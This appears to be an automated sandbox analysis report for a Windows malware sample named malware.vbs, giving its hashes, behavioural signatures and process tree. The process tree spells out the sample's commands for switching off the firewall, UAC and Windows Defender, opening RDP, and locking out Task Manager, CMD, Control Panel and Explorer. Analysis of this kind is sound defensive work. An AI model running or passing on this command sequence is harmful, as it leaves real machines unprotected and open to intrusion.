Analysis
- max time kernel: 300s
- max time network: 306s
- platform: windows10-2004_x64
- resource: win10v2004-20240508-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20240508-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 19-05-2024 19:34
Static task: static1
Behavioral task: behavioral1
- Sample: malware.vbs
- Resource: win7-20240508-en
Behavioral task: behavioral2
- Sample: malware.vbs
- Resource: win10v2004-20240508-en
General
- Target: malware.vbs
- Size: 7KB
- MD5: 9c18843bf13af2e38482ac3fe46f4290
- SHA1: cc90dab75e362b455262c5e3b612b5dfb04f0b38
- SHA256: adb740a4d2814f2fc7078d3a81c9c642cc13e9a77e728483b67e6ca668a2e373
- SHA512: 8dd8d17346f421c461ce66ca7c1ac9e75bd1c5628a0fa81dc4c59db1dcc7ab23b31d35f6c492ddfa3d862b67311559f6c2c5e4d923d40fdca94c313f1f53c797
- SSDEEP: 96:qD/+WSNb8mN8r9f4PPfMSHnx2gqoAqb1j8RW8ELzmdPzWdEKuWP2W9Nukim29mQ2:qD/UqrZgX7xXCdPidfbj2Qr
Malware Config
Signatures
-
Processes (description, ioc, process):
- Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" (reg.exe)
- Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" (reg.exe)
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
Processes (pid, process):
- 5940 bcdedit.exe
- 5956 bcdedit.exe
- 5748 bcdedit.exe
- 396 bcdedit.exe
Creates new service(s) 2 TTPs
-
Disables RegEdit via registry modification 1 IoCs
Processes (description, ioc, process):
- Set value (int) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" (reg.exe)
Disables Task Manager via registry modification
-
Modifies Windows Firewall 2 TTPs 15 IoCs
Processes (pid, process):
- 2688 netsh.exe
- 4432 netsh.exe
- 6140 netsh.exe
- 3312 netsh.exe
- 412 netsh.exe
- 6400 netsh.exe
- 6152 netsh.exe
- 2428 netsh.exe
- 3724 netsh.exe
- 5796 netsh.exe
- 6360 netsh.exe
- 3260 netsh.exe
- 3856 netsh.exe
- 5980 netsh.exe
- 6048 netsh.exe
Possible privilege escalation attempt 8 IoCs
Processes (pid, process):
- 432 takeown.exe
- 5588 icacls.exe
- 6128 takeown.exe
- 5832 icacls.exe
- 5724 takeown.exe
- 5748 icacls.exe
- 5512 takeown.exe
- 5488 icacls.exe
Modifies file permissions 1 TTPs 8 IoCs
Processes (pid, process):
- 432 takeown.exe
- 5588 icacls.exe
- 6128 takeown.exe
- 5832 icacls.exe
- 5724 takeown.exe
- 5748 icacls.exe
- 5512 takeown.exe
- 5488 icacls.exe
Drops file in System32 directory 21 IoCs
Processes (description, ioc, process):
- File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db (OpenWith.exe)
- File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_48.db (OpenWith.exe)
- File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_wide.db (OpenWith.exe)
- File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db (OpenWith.exe)
- File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (powershell.exe)
- File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log (powershell.exe)
- File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_sr.db (OpenWith.exe)
- File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_wide_alternate.db (OpenWith.exe)
- File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db (OpenWith.exe)
- File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_256.db (OpenWith.exe)
- File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_1280.db (OpenWith.exe)
- File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_custom_stream.db (OpenWith.exe)
- File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_exif.db (OpenWith.exe)
- File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db (OpenWith.exe)
- File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_16.db (OpenWith.exe)
- File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db (OpenWith.exe)
- File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_96.db (OpenWith.exe)
- File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_768.db (OpenWith.exe)
- File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_1920.db (OpenWith.exe)
- File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_2560.db (OpenWith.exe)
- File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db (OpenWith.exe)
Drops file in Windows directory 1 IoCs
Processes (description, ioc, process):
- File created C:\Windows\rescache\_merged\431186354\3005941989.pri (netsh.exe)
Launches sc.exe 2 IoCs
Sc.exe is a Windows utility to control services on the system.
Processes (pid, process):
- 5972 sc.exe
- 5656 sc.exe
Processes (pid, process):
- 6248 powershell.exe
- 2692 powershell.exe
- 900 powershell.exe
- 1880 powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Delays execution with timeout.exe 1 IoCs
Processes (pid, process):
- 6412 timeout.exe
Enumerates system info in registry 2 TTPs 6 IoCs
Processes (description, ioc, process):
- Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS (msedge.exe)
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer (msedge.exe)
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName (msedge.exe)
- Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS (msedge.exe)
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer (msedge.exe)
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName (msedge.exe)
Gathers network information 2 TTPs 3 IoCs
Uses commandline utility to view network configuration.
Processes (pid, process):
- 5988 ipconfig.exe
- 3620 ipconfig.exe
- 1880 ipconfig.exe
Kills process with taskkill 3 IoCs
Processes (pid, process):
- 6228 taskkill.exe
- 6348 taskkill.exe
- 6384 taskkill.exe
Modifies data under HKEY_USERS 64 IoCs
Processes (description, ioc, process):
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs (powershell.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.AccountsControl_cw5n1h2txyewy%5Cresources.pri\1d7e5366768b0fd\a01460c8 (netsh.exe)
- Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy%5Cresources.pri\1d5ace438733a83\a01460c8\@{Microsoft.Windows.SecureAssessmentBrowser_10.0.19041.1023_neutra = "Take a Test" (netsh.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies (reg.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs (powershell.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs (powershell.exe)
- Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@sstpsvc.dll,-35001 = "Secure Socket Tunneling Protocol" (netsh.exe)
- Key created \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCached (reg.exe)
- Key created \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCached (reg.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy%5Cresources.pri\1d5acddea4e2414\a01460c8 (netsh.exe)
- Key created \REGISTRY\USER\.DEFAULT\Control Panel\Desktop (reg.exe)
- Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5Cmicrosoft.windows.narratorquickstart_8wekyb3d8bbwe%5Cresources.pri\1d5acdded540f4d\a01460c8\@{Microsoft.Windows.NarratorQuickStart_10.0.19041.1023_neutral_neutral_ = "Narrator" (netsh.exe)
- Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy%5Cresources.pri\1d5acddeb9898a7\a01460c8\@{Microsoft.Windows.OOBENetworkCaptivePortal_10.0.19041.1023_neut = "Captive Portal Flow" (netsh.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.CloudExperienceHost_cw5n1h2txyewy%5Cresources.pri\1d7e5366dd4697d\a01460c8 (netsh.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\Windows\System (reg.exe)
- Set value (int) \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\Windows\System\DisableCMD = "2" (reg.exe)
- Key created \REGISTRY\USER\S-1-5-18_Classes\Local Settings (OpenWith.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer (reg.exe)
- Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.LockApp_cw5n1h2txyewy%5Cresources.pri\1d7e5367a448984\a01460c8\@{Microsoft.LockApp_10.0.19041.1023_neutral__cw5n1h2txyewy?ms-resource://Microsoft.LockApp = "Windows Default Lock Screen" (netsh.exe)
- Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.PeopleExperienceHost_cw5n1h2txyewy%5Cresources.pri\1d7e53672e17460\a01460c8\@{Microsoft.Windows.PeopleExperienceHost_10.0.19041.1023_neutral_neut = "Windows Shell Experience" (netsh.exe)
- Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.AppRep.ChxApp_cw5n1h2txyewy%5Cresources.pri\1d5acddee1afafc\a01460c8\@{Microsoft.Windows.Apprep.ChxApp_1000.19041.1023.0_neutral_neutral_cw5n1h2t = "Windows Defender SmartScreen" (netsh.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Win32WebViewHost_cw5n1h2txyewy%5Cresources.pri (netsh.exe)
- Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.AAD.BrokerPlugin_cw5n1h2txyewy%5Cresources.pri\1d5acdde7226641\a01460c8\@{Microsoft.AAD.BrokerPlugin_1000.19041.1023.0_neutral_neutral_cw5n1h2txyewy?ms-r = "Work or school account" (netsh.exe)
- Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@wlansvc.dll,-36864 = "WLAN Service - WFD Application Services Platform Coordination Protocol (Uses UDP)" (netsh.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion (reg.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs (powershell.exe)
- Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CParentalControls_cw5n1h2txyewy%5Cresources.pri\1d7e53665b78b3b\a01460c8\@{Microsoft.Windows.ParentalControls_1000.19041.1023.0_neutral_neutral_cw5n1h2txyewy?ms-res = "Microsoft family features" (netsh.exe)
- Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%systemroot%\system32\provsvc.dll,-202 = "HomeGroup" (netsh.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer (reg.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs (powershell.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust (powershell.exe)
- Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.XboxGameCallableUI_cw5n1h2txyewy%5Cresources.pri\1d5acdddadc1b8f\a01460c8\@{Microsoft.XboxGameCallableUI_1000.19041.1023.0_neutral_neutral_cw5n1h2txyewy? = "Xbox Game UI" (netsh.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CShellExperienceHost_cw5n1h2txyewy%5Cresources.pri (netsh.exe)
- Key created \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCache (reg.exe)
- Key created \REGISTRY\USER\.DEFAULT\Control Panel\Desktop (reg.exe)
- Key created \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCache (reg.exe)
- Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisableSettingsPage = "1" (reg.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA (powershell.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs (powershell.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople (powershell.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.PeopleExperienceHost_cw5n1h2txyewy%5Cresources.pri\1d7e53672e17460\a01460c8 (netsh.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.AAD.BrokerPlugin_cw5n1h2txyewy%5Cresources.pri (netsh.exe)
- Set value (str) \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCache\en-US = "0c09" (reg.exe)
- Key created \REGISTRY\USER\.DEFAULT\Control Panel\International (reg.exe)
- Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoExplorer = "1" (reg.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs (powershell.exe)
- Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.AccountsControl_cw5n1h2txyewy%5Cresources.pri\1d7e5366768b0fd\a01460c8\@{Microsoft.AccountsControl_10.0.19041.1023_neutral__cw5n1h2txyewy?ms-resource://M = "Email and accounts" (netsh.exe)
- Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@peerdistsh.dll,-9002 = "BranchCache - Hosted Cache Server (Uses HTTPS)" (netsh.exe)
- Key created \REGISTRY\USER\.DEFAULT\Control Panel (reg.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows (reg.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\Windows\System (reg.exe)
- Key created \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCached\Languages (reg.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs (powershell.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates (powershell.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.LockApp_cw5n1h2txyewy%5Cresources.pri\1d7e5367a448984\a01460c8 (netsh.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.XboxGameCallableUI_cw5n1h2txyewy%5Cresources.pri (netsh.exe)
- Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Win32WebViewHost_cw5n1h2txyewy%5Cresources.pri\1d5acdef0fedca\a01460c8\@{Microsoft.Win32WebViewHost_10.0.19041.1023_neutral_neutral_cw5n1h2txyewy?ms-reso = "Desktop App Web Viewer" (netsh.exe)
- Set value (str) \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCache\ (reg.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Win32WebViewHost_cw5n1h2txyewy%5Cresources.pri\1d5acdef0fedca\a01460c8 (netsh.exe)
- Key created \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCached (reg.exe)
- Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel = "1" (reg.exe)
- Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\System32\ieframe.dll,-55175 = "Internet Explorer" (OpenWith.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates (powershell.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.LockApp_cw5n1h2txyewy%5Cresources.pri (netsh.exe)
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 40 IoCs
Processes (pid, process, number of hits):
- 2692 powershell.exe ×3
- 3080 msedge.exe ×2
- 4844 msedge.exe ×2
- 5272 identity_helper.exe ×2
- 900 powershell.exe ×3
- 1880 powershell.exe ×15
- 6248 powershell.exe ×3
- 3968 msedge.exe ×2
- 2112 msedge.exe ×2
- 4724 identity_helper.exe ×2
- 3344 msedge.exe ×4
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 16 IoCs
Processes (pid, process, number of hits):
- 4844 msedge.exe ×10
- 2112 msedge.exe ×6
Suspicious use of AdjustPrivilegeToken 38 IoCs
Processes (description, pid, process):
- Token: SeShutdownPrivilege 2508 powercfg.exe
- Token: SeCreatePagefilePrivilege 2508 powercfg.exe
- Token: SeShutdownPrivilege 5048 powercfg.exe
- Token: SeCreatePagefilePrivilege 5048 powercfg.exe
- Token: SeShutdownPrivilege 888 powercfg.exe
- Token: SeCreatePagefilePrivilege 888 powercfg.exe
- Token: SeShutdownPrivilege 2704 powercfg.exe
- Token: SeCreatePagefilePrivilege 2704 powercfg.exe
- Token: SeDebugPrivilege 2692 powershell.exe
- Token: SeDebugPrivilege 3956 whoami.exe
- Token: SeTakeOwnershipPrivilege 5724 takeown.exe
- Token: SeShutdownPrivilege 6100 powercfg.exe
- Token: SeCreatePagefilePrivilege 6100 powercfg.exe
- Token: SeShutdownPrivilege 6140 powercfg.exe
- Token: SeCreatePagefilePrivilege 6140 powercfg.exe
- Token: SeShutdownPrivilege 1572 powercfg.exe
- Token: SeCreatePagefilePrivilege 1572 powercfg.exe
- Token: SeShutdownPrivilege 4612 powercfg.exe
- Token: SeCreatePagefilePrivilege 4612 powercfg.exe
- Token: SeDebugPrivilege 900 powershell.exe
- Token: SeDebugPrivilege 5356 whoami.exe
- Token: SeTakeOwnershipPrivilege 5512 takeown.exe
- Token: SeTakeOwnershipPrivilege 432 takeown.exe
- Token: SeTakeOwnershipPrivilege 6128 takeown.exe
- Token: SeDebugPrivilege 1880 powershell.exe
- Token: SeDebugPrivilege 6228 taskkill.exe
- Token: SeDebugPrivilege 6348 taskkill.exe
- Token: SeDebugPrivilege 6384 taskkill.exe
- Token: SeShutdownPrivilege 1840 powercfg.exe
- Token: SeCreatePagefilePrivilege 1840 powercfg.exe
- Token: SeShutdownPrivilege 3724 powercfg.exe
- Token: SeCreatePagefilePrivilege 3724 powercfg.exe
- Token: SeShutdownPrivilege 1640 powercfg.exe
- Token: SeCreatePagefilePrivilege 1640 powercfg.exe
- Token: SeShutdownPrivilege 5024 powercfg.exe
- Token: SeCreatePagefilePrivilege 5024 powercfg.exe
- Token: SeDebugPrivilege 6248 powershell.exe
- Token: SeDebugPrivilege 900 whoami.exe
Suspicious use of FindShellTrayWindow 50 IoCs
Processes (pid, process, number of hits):
- 4844 msedge.exe ×25
- 2112 msedge.exe ×25
Suspicious use of SendNotifyMessage 48 IoCs
Processes (pid, process, number of hits):
- 4844 msedge.exe ×24
- 2112 msedge.exe ×24
Suspicious use of SetWindowsHookEx 3 IoCs
Processes (pid, process):
- 5916 OpenWith.exe
- 5728 OpenWith.exe
- 5724 OpenWith.exe
Suspicious use of WriteProcessMemory 64 IoCs
Processes (description, pid, process, target process; each event was recorded twice):
- PID 1896 wrote to memory of 1804: cmd.exe (1896) -> net.exe ×2
- PID 1804 wrote to memory of 4780: net.exe (1804) -> net1.exe ×2
- PID 1896 wrote to memory of 2508: cmd.exe (1896) -> powercfg.exe ×2
- PID 1896 wrote to memory of 5048: cmd.exe (1896) -> powercfg.exe ×2
- PID 1896 wrote to memory of 888: cmd.exe (1896) -> powercfg.exe ×2
- PID 1896 wrote to memory of 2704: cmd.exe (1896) -> powercfg.exe ×2
- PID 1896 wrote to memory of 2692: cmd.exe (1896) -> powershell.exe ×2
- PID 1896 wrote to memory of 2428: cmd.exe (1896) -> netsh.exe ×2
- PID 1896 wrote to memory of 3856: cmd.exe (1896) -> netsh.exe ×2
- PID 1896 wrote to memory of 2688: cmd.exe (1896) -> netsh.exe ×2
- PID 1896 wrote to memory of 3724: cmd.exe (1896) -> netsh.exe ×2
- PID 1896 wrote to memory of 4432: cmd.exe (1896) -> netsh.exe ×2
- PID 1896 wrote to memory of 2716: cmd.exe (1896) -> reg.exe ×2
- PID 1896 wrote to memory of 4328: cmd.exe (1896) -> reg.exe ×2
- PID 1896 wrote to memory of 4476: cmd.exe (1896) -> reg.exe ×2
- PID 1896 wrote to memory of 2256: cmd.exe (1896) -> reg.exe ×2
- PID 1896 wrote to memory of 2232: cmd.exe (1896) -> reg.exe ×2
- PID 1896 wrote to memory of 3260: cmd.exe (1896) -> reg.exe ×2
- PID 1896 wrote to memory of 3120: cmd.exe (1896) -> reg.exe ×2
- PID 1896 wrote to memory of 1172: cmd.exe (1896) -> reg.exe ×2
- PID 1896 wrote to memory of 2780: cmd.exe (1896) -> reg.exe ×2
- PID 1896 wrote to memory of 3344: cmd.exe (1896) -> reg.exe ×2
- PID 1896 wrote to memory of 5072: cmd.exe (1896) -> reg.exe ×2
- PID 1896 wrote to memory of 3012: cmd.exe (1896) -> reg.exe ×2
- PID 1896 wrote to memory of 4304: cmd.exe (1896) -> reg.exe ×2
- PID 1896 wrote to memory of 4348: cmd.exe (1896) -> reg.exe ×2
- PID 1896 wrote to memory of 840: cmd.exe (1896) -> reg.exe ×2
- PID 1896 wrote to memory of 4052: cmd.exe (1896) -> reg.exe ×2
- PID 1896 wrote to memory of 4624: cmd.exe (1896) -> reg.exe ×2
- PID 1896 wrote to memory of 1584: cmd.exe (1896) -> reg.exe ×2
- PID 1896 wrote to memory of 4676: cmd.exe (1896) -> reg.exe ×2
- PID 1896 wrote to memory of 5008: cmd.exe (1896) -> reg.exe ×2
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\malware.vbs"1⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\malware.bat" "1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet session2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session3⤵
-
C:\Windows\system32\powercfg.exepowercfg /setdcvalueindex SCHEME_CURRENT SUB_BATTERY BATACTIONCRIT 02⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /setacvalueindex SCHEME_CURRENT SUB_BATTERY BATACTIONCRIT 02⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /setdcvalueindex SCHEME_CURRENT SUB_BATTERY BATLEVELCRIT 02⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /setacvalueindex SCHEME_CURRENT SUB_BATTERY BATLEVELCRIT 02⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\PlugPlay' -Name 'Start' -Value 4"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="Allow RDP" dir=in action=allow protocol=TCP localport=33892⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="Allow Ping" dir=in action=allow protocol=ICMPv42⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="Allow Outbound" dir=out action=allow2⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yes2⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off2⤵
- Modifies Windows Firewall
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowRemoteRPC /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exeREG IMPORT "C:\Users\Admin\AppData\Local\Temp\disable_winload.reg"2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoManageMyComputerVerb /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCached" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCache" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCached\Languages" /v "0c09" /t REG_SZ /d "en-US" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCached\Languages" /v "0419" /t REG_SZ /d "ru-RU" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCache" /v "en-US" /t REG_SZ /d "0c09" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCache" /v "ru-RU" /t REG_SZ /d "0419" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f2⤵
- UAC bypass
-
  C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

  C:\Windows\system32\reg.exe
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v DisableSettingsPage /t REG_DWORD /d 1 /f

  C:\Windows\system32\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v PreferredUILanguages /t REG_MULTI_SZ /d ru-RU /f

  C:\Windows\system32\reg.exe
    reg add "HKCU\Control Panel\International" /v sLanguage /t REG_SZ /d rus /f

  C:\Windows\system32\reg.exe
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableGPO" /t REG_DWORD /d 1 /f

  C:\Windows\system32\reg.exe
    reg add "HKCU\Software\Policies\Microsoft\Windows\System" /v "DisableGPO" /t REG_DWORD /d 1 /f
